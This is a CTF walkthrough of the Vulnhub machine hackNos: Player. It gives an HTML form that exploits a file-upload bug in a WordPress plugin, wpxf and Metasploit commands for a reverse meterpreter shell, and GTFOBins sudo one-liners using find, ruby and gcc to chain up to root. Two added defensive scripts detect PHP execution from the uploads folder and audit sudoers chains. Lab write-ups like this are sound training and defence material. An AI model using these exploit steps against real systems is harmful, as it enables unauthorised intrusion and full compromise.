hackNos: Player v1.1 | Vulnhub Walkthrough

egghunter, published in Dot Dot Slash, May 23, 2020

hackNos is a machine with an interesting mix of realism and CTF-style tricks. Even though the underlying vulnerabilities are straightforward to exploit, this machine demands next-level enumeration skills. Thanks to Rahul Gehlaut for this amazing box.

Level: Intermediate

You need to fire up arp-scan or netdiscover to find the IP of hackNos. There are only two services: HTTP (80) and MySQL (3306).

Use arp-scan to discover IP address
The only interesting service is a website on port 80

Enumeration

I could see an Apache default page but was unable to find any useful paths. I ran dirb with the common and big word-lists and tried extension-based dir-busting. I even tried my luck with cewl to generate a custom word-list. But I couldn't find any leads.

Default page on port 80

After a good sleep following a hectic work week, I sat down and thought it through. Within half an hour of enumeration, I found the clue on the default page itself: it states that the document root is /var/www/html/g@web. That usually means the default index.html page you are seeing is inside the g@web folder. However, on this site the document root is not /var/www/html/g@web but /var/www/html (I know, the information on the page is misleading, but probably a CTF-style modification).

You need to browse to http://192.168.56.107/g@web/ to find a WordPress blog.

Hint on default page
WordPress blog

When it comes to WordPress enumeration, my favorite tool is wpscan. But make sure that you run wpscan with an API key, which you can generate at wpvulndb.com (you need to register a free account), to see all known vulnerabilities.

wpscan --url http://192.168.56.107/g@web/ --api-token <token>
Run wpscan with the API token to see vulnerabilities

When it comes to WordPress, not updating plugins can largely undermine the security of the website. WP Support Plus Responsive Ticket System v7.1.3 is in use here; it is vulnerable to SQL injection, RCE via file upload and privilege escalation.

The WP Support Plus Responsive Ticket System plugin is vulnerable to RCE, privilege escalation, SQL injection, etc.

Exploiting RCE for shell

If you read the advisory WPVDB ID-10119 for remote code execution, it is self-explanatory. The vulnerable plugin does not restrict the upload of .phtml, .php5 and similar lesser-known PHP extensions, enabling us to upload reverse shell PHP code with a .phtml extension.

I used the reverse shell PHP payload from the /usr/share/webshells/php/ folder, which gets uploaded to the http://192.168.56.107/g@web/wp-content/uploads/wpsp/ folder using the sample HTML form below. The PHP reverse shell payload should be edited to match your netcat listener and saved with a .phtml or .php5 extension.

<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://192.168.56.107/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
</body>
</html>
Upload the reverse shell PHP code as a .phtml file
A reverse shell can be obtained via the file upload
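From the defender's side, the tell-tale sign of this plugin bug is a request for a PHP-executable file (.phtml, .php5 and friends) served out of wp-content/uploads, a directory that should only ever hand back static media. The following script is an added example, not part of the original walkthrough: it runs that check over constructed Apache access-log lines that mirror the box (192.168.56.103 is the attacker, the blog lives under /g@web); the extension list is an assumption based on what a stock mod_php configuration maps to the PHP engine.

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions a stock mod_php setup commonly hands to the PHP engine (assumed
# list; Debian's php.conf matches .php, .phtml and .phar, older configs .php5).
PHP_EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "phps"}

# Minimal Apache combined-log pattern: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_php_executable(url_path: str) -> bool:
    """True if the final extension of the request path is one PHP would execute."""
    name = unquote(urlsplit(url_path).path).rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext in PHP_EXECUTABLE_EXTS

def flag_upload_execution(lines, uploads_dir="/wp-content/uploads/"):
    """Return (client_ip, path, status) for every request that fetched a
    PHP-executable file from the uploads tree. A 200 here means Apache
    actually ran the uploaded script rather than serving it as a download."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        path = unquote(urlsplit(m["target"]).path)  # drop any query string
        if uploads_dir in path and is_php_executable(path):
            hits.append((m["ip"], path, int(m["status"])))
    return hits

# Constructed sample lines (not real captures) using the walkthrough's hosts.
SAMPLE_LOG = [
    '192.168.56.103 - - [23/May/2020:10:14:55 +0000] "POST /g@web/wp-admin/admin-ajax.php HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '192.168.56.103 - - [23/May/2020:10:15:01 +0000] "GET /g@web/wp-content/uploads/wpsp/rshell.phtml?x=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [23/May/2020:10:15:07 +0000] "GET /g@web/wp-content/uploads/2020/05/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [23/May/2020:10:15:09 +0000] "GET /g@web/wp-login.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, status in flag_upload_execution(SAMPLE_LOG):
        print(f"ALERT script executed from uploads: {ip} -> {path} ({status})")
```

The matching fix on the server is to stop Apache from passing anything under wp-content/uploads to the PHP engine (for example `php_admin_flag engine off` in a Directory block scoped to that path), so an uploaded .phtml is returned as text instead of executed.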

Alternatively, we can use wordpress-exploit-framework (wpxf), an awesome tool by rastating that is pretty much Metasploit for WordPress. The tool supports Metasploit payloads and follows the familiar Metasploit syntax.

Alternatively, wordpress-exploit-framework can be used to exploit the issue
Configure a reverse handler in Metasploit to get a shell
# commands to run the exploit module in wpxf
wpxf # start wordpress-exploit-framework
search wp_support
use exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload
set host 192.168.56.107
set target_uri /g@web
set payload meterpreter_reverse_tcp
set lport 8443
set lhost 192.168.56.103
# Do not forget to spin up a handler in Metasploit
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.103
set lport 8443
run

A shell is only the beginning

The way beyond the shell was frustrating. I pursued various vectors, including local exploits, reusing the password disclosed in wp-config.php, cracking user passwords looted from the WordPress database, etc. Later I found the necessary hint in the wp_usermeta table inside the database, in the form of a meta_value.

Tip: You need an interactive shell to work with MySQL normally; in restrictive shells, use python -c 'import pty; pty.spawn("/bin/sh")' to spawn an interactive shell.

mysql -u wp -p
Database credentials can be obtained from /var/www/html/g@web/wp-config.php
The wp_usermeta table has the hint for privilege escalation

After a few trial-and-error attempts, I was able to log in as the local user security with the password we found earlier.

There are four users in the system
Logged in as the security user with the password from the database

Linux-smart-enumeration (LSE) is usually my trusty script for local enumeration on any Linux box. I found from the LSE output that the user security is allowed to run the find command as hackNos-boat. GTFOBins is an awesome project that can help in situations involving SUID or sudo misconfigurations; it maintains a curated list of known abuse vectors for Unix binaries. We can use the command below to escalate our privileges.

#https://gtfobins.github.io/gtfobins/find/
sudo -u hackNos-boat find . -exec /bin/sh \; -quit
User has permission to run the find command as hackNos-boat
Escalate privileges to hackNos-boat

The hackNos-boat user has similar access to run ruby as hunter. The hunter account has access to the user flag.

#https://gtfobins.github.io/gtfobins/ruby/
sudo -u hunter ruby -e 'exec "/bin/sh"'
User has permission to run ruby as hunter
User flag can be accessed from hunter account

Similarly, hunter has sudo access to gcc. At this point, rooting is trivial.

#https://gtfobins.github.io/gtfobins/gcc/#shell
sudo gcc -wrapper /bin/sh,-s .
Hunter has access to run gcc with root privileges
Root access obtained
Root flag
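The three sudo rules above are individually modest (one binary, one target user) but chain all the way to root, which is the kind of least-privilege gap an audit should catch before a pentester does. The script below is an added example, not part of the walkthrough: it parses sudoers-style rules, flags delegations of binaries known to hand back a shell (limited here to the three the box uses: find, ruby and gcc; extend the set from GTFOBins for your own policy), and computes which accounts a given user can reach by chaining them. The sample rules are constructed to mirror this box, not copied from it.

```python
import re
from collections import deque

# Binaries the box chains through; each lets the run-as user spawn a shell
# (see GTFOBins). Assumed starting set; extend it from your own policy.
SHELL_CAPABLE = {"find", "ruby", "gcc"}

# user host = (runas_user[:runas_group]) [NOPASSWD:] cmd[, cmd ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*(?:NOPASSWD:\s*)?(?P<cmds>.+)$"
)

def parse_sudoers(lines):
    """Yield (user, runas_user, binary_name) for each command of each rule;
    comments, Defaults and alias definitions are skipped."""
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip() or "root"  # "(:group)" => root
        for cmd in m["cmds"].split(","):
            binary = cmd.strip().split()[0]  # ignore arguments
            yield m["user"], runas, binary.rsplit("/", 1)[-1]

def risky_delegations(lines):
    """Rules that grant another account a binary able to hand back a shell."""
    return [(u, r, b) for u, r, b in parse_sudoers(lines) if b in SHELL_CAPABLE]

def reachable_accounts(lines, start):
    """Accounts obtainable from `start` by chaining risky delegations (BFS)."""
    edges = {}
    for u, r, _ in risky_delegations(lines):
        edges.setdefault(u, set()).add(r)
    seen, todo = {start}, deque([start])
    while todo:
        for nxt in edges.get(todo.popleft(), ()):
            if nxt not in seen:
                seen.add(nxt)
                todo.append(nxt)
    return sorted(seen - {start})

SAMPLE_SUDOERS = [  # constructed to mirror the box's chain
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "security ALL=(hackNos-boat) NOPASSWD: /usr/bin/find",
    "hackNos-boat ALL=(hunter) NOPASSWD: /usr/bin/ruby",
    "hunter ALL=(root) NOPASSWD: /usr/bin/gcc",
    "www-data ALL=(root) /usr/sbin/service apache2 restart  # not shell-capable",
]
```

Run it against `sudo -l` output or the real sudoers file and any non-empty result for an unprivileged account means the rule set needs tightening, typically by replacing the generic binary with a wrapper script that takes no user-controlled arguments.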

Closing Thoughts

hackNos is a good machine with a focus on enumeration. The GTFOBins chaining scenario was fun. Overall a solid challenge.
